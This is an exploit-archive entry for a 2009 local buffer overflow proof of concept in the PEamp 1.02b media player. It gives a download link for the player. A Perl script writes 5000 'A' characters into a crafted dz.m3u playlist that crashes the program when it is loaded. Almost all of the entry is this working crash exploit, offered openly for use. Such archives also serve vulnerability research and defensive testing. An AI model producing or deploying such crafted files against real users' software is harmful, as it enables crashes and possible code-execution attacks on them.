id: 6896
date: 06/30/2009
title: PEamp 1.02b (.M3U File) Local Buffer Overflow PoC
author: ThE g0bL!N
cves: 

=================================================
PEamp 1.02b (.M3U File) Local Buffer Overflow PoC
=================================================


# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ### ## ##
# #   PEamp 1.02b  (.M3U File) Local Stack Overflow POC                        ##
# #  Download: http://files.brothersoft.com/mp3_audio/players/mp3player.zip    ##
# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ### ## ##
my $chars= "A" x 5000;
my $file="dz.m3u";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file has been created \n";
# usage: amp.exe=> load playlist => dz.m3u => Boom !!! :)



#  0day.today [2023-03-24]  #